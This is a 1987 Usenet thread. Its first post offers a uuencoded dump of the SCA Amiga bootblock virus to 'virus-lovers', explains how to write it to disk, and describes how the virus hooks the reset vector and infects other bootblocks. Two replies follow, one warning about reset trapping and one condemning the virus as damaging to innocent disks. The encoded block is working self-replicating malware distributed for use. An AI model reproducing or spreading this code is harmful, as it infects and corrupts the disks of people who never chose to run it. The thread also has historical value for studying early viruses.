boxdiger@altger.UUCP (10/28/87)
UUENCODED SCA - VIRUS
---------------------
[ i'm not a bad line, i'm a VIRUS !!!!!!]
This is for Bill (CATS) and other virus-lovers.
The uuencoded virus is not an Installprogramm, it's the dumped data
of block 0+1 of an infected disk (SCA VIRUS).
The code can be written to disk using a utility like c-monitor
(reading file to memory and then write it to disk) or diskzap.
I used C-monitor (a german program).
Some informations:
------------------
- The virus copies itself to $7ec00 in your amiga.(end of chipmemory)
- It changes the CoolCapture-pointer in Execbase in order to be
called each time you hit C-A-A.
- The routine is pointed to by CoolCapture changes the SendIO function.
- The new SendIO examines the IORequest and if it's the request to
read the bootblock, reads it and, if not infected, writes his
own code to the bootblock.
- CoolCapture will be changed everytime the virus is called,
because Exec set's up the original vectors at each reset.
- you can enable the reinitalization of CoolCapture by pressing the
left mouse button down whil resetting. The screen will then
become green for a few ticks.
- There is an counter built in which will be incremented by each
infection. This counter is anded with $f (15) and if true,
let appear a little (nice ?) message on your screen.
Good Amiga-hack
Pat.
==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==
| |
| <^_^> Patrick G., living in Switzerland, using a german system. |
| |
| UUCP : ....seismo!mcvax!unido!altger!boxdiger Yep that's all folks ! |
| Phone: Don't try it, i'm not a home.... |
==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==
---<> snip here <> snap there <> snip where ? <> snup snippy <> snip ! <>---
begin 644 virus
M1$]3`#?\NP)#2%<A0?K_\D/Y``?L`#`\`0`BV%'(__Q.N0`'[(A#^@+G+'D`\
M```$3J[_H"!`(&@`%G``3G4L>0````0(.0`&`+_@`68<0JX`+F$``#Q+^0#?`
M\``[?`!@`8!P,F$``D9@'&$``!Q!^0`'[*2Q[OXZ9PPC[OXZ``?OWBU(_CI._
M=2U\``?L/@`N0>X`(D)`<A?06%')__Q&0#"`3G4,J0``!```)&8&N>D`*&<&/
M3OD`!^_<0I1.N0`'[]P,E$1/4P!F,"UY``?OWOXZ0KD`!^_>2.?__$OY`-_PB
M`$'Y``?L!"`0L*P`!&<&*$EA```(3-\__TYU!'D``0`'[OP&>0`!``?N^#`YY
M``?N^`)```\,0```9@1A``!2(DPS?``!`!PL>0````1.KOXX(DPS?``#`!PC;
M?```!```)"-\``?L```H(WP``````"PL>0````1.KOXX(DPS?``$`!PL>0``F
M``1.KOXX3G4B3$*I`"0S?``)`!PL>0````1.KOXX1_D`!^L`0_D`!^[^0H`LT
M>0````1.KOW8(\``!\C\(DLL>0`'R/Q.KO\Z0?D`!^H`)T@`!'`!,CP!0#0\\
M`,@L>0`'R/Q.KOYZ*WP`!^[$`(`[?`@``8)P9&$``,Q%^0`'[QM!^0`'R0`C+
MR``'Z@@P/`?00IA1R/_\.WPN=0"..WSVU0"0.WP`.`"2.WP`T`"40JT!"#M\W
M$@`!`$*M`0([?(.``)8B2T*`$!IR42QY``?(_$ZN_Q`B2T*`$!H,````9U`@H
M2D7R```L>0`'R/Q.KO_$=`<R/`@`<`)A``!*.T$!@@9!`2)1RO_P0H`0&F$`^
M`#9T!W`"80``+@1!`2([00&"4<K_\$*`$!IA```:8`#_4B!Y``?(_"MH`"8`8
M@#M\`0``EDYUT$`,+0````9F^`PM````!F?X4<C_[DYU`.``!P#BR0!P!?_^I
M`8`.8G0%__X!@`00=07__@&`"`"&!?_^`8`-48H%__X!@```_____@`5__K_X
MYF=R87!H:6-S+FQI8G)A<GD`9&]S+FQI8G)A<GD``"!3;VUE=&AI;F<@=V]N%
M9&5R9G5L(&AA<R!H87!P96YE9-*J+1=9;W5R($%-24=!(&ES(&%L:79E("$A`
M(;Z@01-A;F0L(&5V96X@8F5T=&5R+BXN4%`$'U-O;64@;V8@>6]U<B!D:7-KV
M<R!A<F4@:6YF96-T961N,EH.8GD@82!625)54R`A(2&,>#(606YO=&AE<B!MW
M87-T97)P:65C92!O9H(R,A94:&4@365G82U-:6=H='D@4T-!("$AW&X``$[Y:
B`````$$A4T-!(5-#02%30T$A4T-!(5-#02%30T$A4T-!(4-!N
``
end
size 1024sean@ms.uky.edu (Sean Casey) (10/30/87)
In article <15000003@altger.UUCP> boxdiger@altger.UUCP writes: >- It changes the CoolCapture-pointer in Execbase in order to be > called each time you hit C-A-A. I had been under the impression that C-A-A did some sort of hardware reset and could not be trapped. So what this means is that it possible to totally take over the machine to the point where it must be powered down to regain control. This is really a shame, because some software writer is bound to use it someday to protect his game. Even worse, it means one can write a trojan horse that does nasty things while the user is trying to reset his machine. Sean -- -- Sean Casey sean@ms.uky.edu, {rutgers,uunet,cbosgd}!ukma!sean -- (the Empire guy) sean@ms.uky.csnet, sean@UKMA.BITNET -- "Inconceivable!"
farren@gethen.UUCP (10/31/87)
In article <15000003@altger.UUCP> boxdiger@altger.UUCP writes: [after a discussion of the virus and even a uuencoded virus bootblock] > >Good Amiga-hack > No. BAD Amiga-hack. While it's technically interesting, it does damage (and, in the case of copy-protected commercial software, potentially fatal damage) to otherwise innocent disks. BAD! Anything which is going to alter, in any way, someone's system or data, without giving him/her the opportunity to NOT alter them (by not running the program, if need be) is bad. I don't care how benign the virus is supposed to be, it is still a childish stunt, accomplishing nothing except to make a lot of people a little more paranoid about their Amigas. Are we supposed to think this is a good thing? I don't. -- ---------------- Michael J. Farren "... if the church put in half the time on covetousness unisoft!gethen!farren that it does on lust, this would be a better world ..." gethen!farren@lll-winken.arpa Garrison Keillor, "Lake Wobegon Days"